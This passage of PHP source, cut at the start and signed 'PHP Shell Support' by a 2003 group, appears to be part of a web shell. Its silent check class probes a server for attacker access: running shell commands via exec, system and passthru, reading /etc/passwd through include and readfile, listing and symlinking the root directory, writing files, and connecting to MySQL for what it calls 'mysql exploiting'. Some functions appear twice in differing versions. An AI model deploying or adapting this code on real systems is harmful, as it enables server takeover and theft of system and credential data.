"copy "); $sys = true; if (@unlink("$currentdir/copytest")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } } else { $this->output_state(0, "copy "); } if (@copy($scriptpath, "/tmp/copytest")) { $this->output_state(2, "copy2/tmp"); //$sys = true; if (!$del) { if (@unlink("tmp/copytest")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } } } else { $this->output_state(0, "copy2/tmp"); } if (@link("/", "$currentdir/link2root")) { $this->output_state(1, "link "); $sys = true; if (!$del) { if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } } } else { $this->output_state(0, "link "); } if (@symlink("/", "$currentdir/link2root")) { $this->output_state(1, "symlink "); $sys = true; if (!$del) { if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } } } else { $this->output_state(0, "symlink "); } if ($sys) { return 1; } else { return ; } } function mysql_checks() { if ($this->mysql_do=="yes") { if (@mysql_pconnect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) { $this->output_state(1, "mysql_pconnect"); $mstate = 1; } else { $this->output_state(0, "mysql_pconnect"); $mstate = 0; } } else { $this->output_state(3, "mysql_pconnect"); $mstate = 2; } if ($this->mysql_do=="yes") { if (@mysql_connect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) { $this->output_state(1, "mysql_connect"); $mstate = 1; } else { $this->output_state(0, "mysql_connect"); $mstate = 0; } } else { $this->output_state(3, "mysql_connect"); $mstate = 2; } if ($this->mysql_state=="fail") { echo "\n\n<!-- MYSQL ERROR:\n".mysql_error()."\n-->\n\n"; echo "<script> alert(\"you have a mysql error:\\n ".mysql_error()."\\n\\nbecause of this the mysql exploiting will be off\"); </script>"; } return $mstate; } } class php_check_silent { function php_check_silent($host="notset", $username="", $pass="", $db="") { if ($host!="notset") { $this->mysql_do = "yes"; $this->mysql_host = $host; $this->mysql_user = $username; $this->mysql_pass = $pass; $this->mysql_db = $db; } else { $this->mysql_do = "no"; } $this->mainstate = "safe"; if ($this->system_checks("/bin/ls")) { $this->output_mainstate(1, "system checks"); } else { $this->output_mainstate(0, "system checks"); } if ($this->reading_checks()) { $this->output_mainstate(1, "reading checks"); } else { $this->output_mainstate(0, "reading checks"); } if ($this->miscfile_checks()) { $this->output_mainstate(1, "misc filesystem checks"); } else { $this->output_mainstate(0, "misc filesystem checks"); } $this->mysql_checks(); } function output_state($state = 0, $name = "function") { if ($state==0) { //echo "$name\t\tfailed\n"; } if ($state==1) { //echo "$name\t\t<font color=red>OK</font>\n"; } if ($state==2) { //echo "$name\t\t<font color=yellow>OK</font>\n"; } } function output_mainstate($state = 0, $name = "functions") { if ($state==1) { //echo "\n$name returned: <font color=red>VULNERABLE</font>\n\n"; $this->mainstate = "unsafe"; } else { //echo "\n$name returned: <font color=green>OK</font>\n\n"; } } function system_checks($cmd = "/bin/ls") { if ($pp = popen($cmd, "r")) { if (fread($pp, 2096)) { $this->output_state(1, "popen "); $sys = true; } else { $this->output_state(0, "popen "); } } else { $this->output_state(0, "popen "); } if (@exec($cmd)) { $this->output_state(1, "exec "); $sys = true; $this->cmd_method = "exec"; } else { $this->output_state(0, "exec "); } if (@shell_exec($cmd)) { $this->output_state(1, "shell_exec"); $sys = true; $this->cmd_method = "shel_exec"; } else { $this->output_state(0, "shell_exec"); } echo "<!-- "; if (@passthru($cmd)) { echo " -->"; $this->output_state(1, "passthru"); $sys = true; $this->cmd_method = "passthru"; } else { echo " -->"; $this->output_state(0, "passthru"); } echo "<!-- "; if (@system($cmd)) { echo " -->"; $this->output_state(1, "system "); $sys = true; $this->cmd_method = "system"; } else { echo " -->"; $this->output_state(0, "system "); } //if ($output = `$cmd`)) { $this->output_state(1, "backtick"); $sys = true; } else { $this->output_state(0, "backtick"); } if ($sys) { return 1; $this->cmd_state = "yes"; } else { return ; } } function reading_checks($file = "/etc/passwd") { if (@function_exists("require_once")) { if (@require_once($file)) { $this->output_state(1, "require_once"); $sys = true; } else { $this->output_state(0, "require_once"); } } if (@function_exists("require")) { if (@require($file)) { $this->output_state(1, "require"); $sys = true; } else { $this->output_state(0, "require"); } } if (@function_exists("include")) { if (@include($file)) { $this->output_state(1, "include "); $sys = true; } else { $this->output_state(0, "include "); } } if (@function_exists("file_get_contents")) { if (@file_get_contents($file)) { $this->output_state(1, "filegetcontents"); $sys = true; } else { $this->output_state(0, "filegetcontents"); } } else { $this->output_state(0, "filegetcontents"); } echo "<!-- "; if (@show_source($file)) { echo " -->"; $this->output_state(1, "show_source"); $this->read_method = "show_source"; $sys = true; } else { echo " -->"; $this->output_state(0, "show_source"); } echo "<!-- "; if (@readfile($file)) { echo " -->"; $this->output_state(1, "readfile"); $this->read_method = "readfile"; $sys = true; } else { echo " -->"; $this->output_state(0, "readfile"); } if (@fopen($file, "r")) { $this->output_state(1, "fopen "); $this->read_method = "fopen"; $sys = true; } else { $this->output_state(0, "fopen "); } if (@file($file)) { $this->output_state(1, "file "); $this->read_method = "file"; $sys = true; } else { $this->output_state(0, "file "); } if ($sys) { return 1; } else { return ; } } function miscfile_checks() { $currentdir = @getcwd(); $scriptpath = $_SERVER["PATH_TRANSLATED"]; if (@opendir($currentdir)) { $this->output_state(2, "opendir \$cwd"); $dp = @opendir("$currentdir"); $files=""; $this->browse_state = "lim"; while($file = @readdir($dp)) { $files .= $file; } if (@strstr($files, '.')) { $this->output_state(2, "readdir \$cwd"); $this->browse_state = "lim"; } else { $this->output_state(0, "readdir \$cwd"); } } else { $this->output_state(0, "opendir \$cwd"); } if (@opendir("/")) { $this->output_state(1, "opendir /"); $sys = true; $dp = @opendir("/"); $this->browse_state = "yes"; $files=""; while($file = @readdir($dp)) { $files .= $file; } if (@strstr($files, '.')) { $this->output_state(1, "readdir /"); $this->browse_state = "yes"; } else { $this->output_state(0, "readdir /"); } } else { $this->output_state(0, "opendir /"); } if (@mkdir("$currentdir/test", 0777)) { $this->output_state(1, "mkdir "); $sys = true; } else { $this->output_state(0, "mkdir "); } if (@rmdir("$currentdir/test")) { $this->output_state(1, "rmdir "); $sys = true; } else { $this->output_state(0, "rmdir "); } if (@copy($scriptpath, "$currentdir/copytest")) { $this->output_state(2, "copy "); $sys = true; if (@unlink("$currentdir/copytest")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } } else { $this->output_state(0, "copy "); } if (@copy($scriptpath, "/tmp/copytest")) { $this->output_state(2, "copy2/tmp"); //$sys = true; if (!$del) { if (@unlink("tmp/copytest")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } } } else { $this->output_state(0, "copy2/tmp"); } if (@link("/", "$currentdir/link2root")) { $this->output_state(1, "link "); $sys = true; if (!$del) { if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } } } else { $this->output_state(0, "link "); } if (@symlink("/", "$currentdir/link2root")) { $this->output_state(1, "symlink "); $sys = true; if (!$del) { if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } } } else { $this->output_state(0, "symlink "); } if ($sys) { return 1; } else { return ; } } function mysql_checks() { if ($this->mysql_do=="yes") { if (@mysql_pconnect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) { $this->output_state(1, "mysql_pconnect"); $mstate = 1; $this->mysql_state = "ok"; } else { $this->output_state(0, "mysql_pconnect"); $mstate = 0; $this->mysql_state = "fail"; } } else { $this->output_state(3, "mysql_pconnect"); $mstate = 2; $this->mysql_state = "pass"; } if ($this->mysql_do=="yes") { if (@mysql_connect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) { $this->output_state(1, "mysql_connect"); $mstate = 1; $this->mysql_state = "ok"; } else { $this->output_state(0, "mysql_connect"); $mstate = 0; $this->mysql_state = "fail"; } } else { $this->output_state(3, "mysql_connect"); $mstate = 2; $this->mysql_state = "pass"; } if ($this->mysql_state=="fail") { echo "<!-- MYSQL ERROR:\n".mysql_error()."\n-->"; echo "<script> alert(\"you have a mysql error:\\n ".mysql_error()."\\n\\nbecause of this the mysql exploiting will be off\"); </script>"; } return $mstate; } } // the end :] ?> <center>Copyright © 2003 <a href="http://www.bansacviet.net">BSV Groups</a> <br>PHP Shell Support by <a href="mailto:admin@bansacviet.net">DTN</a>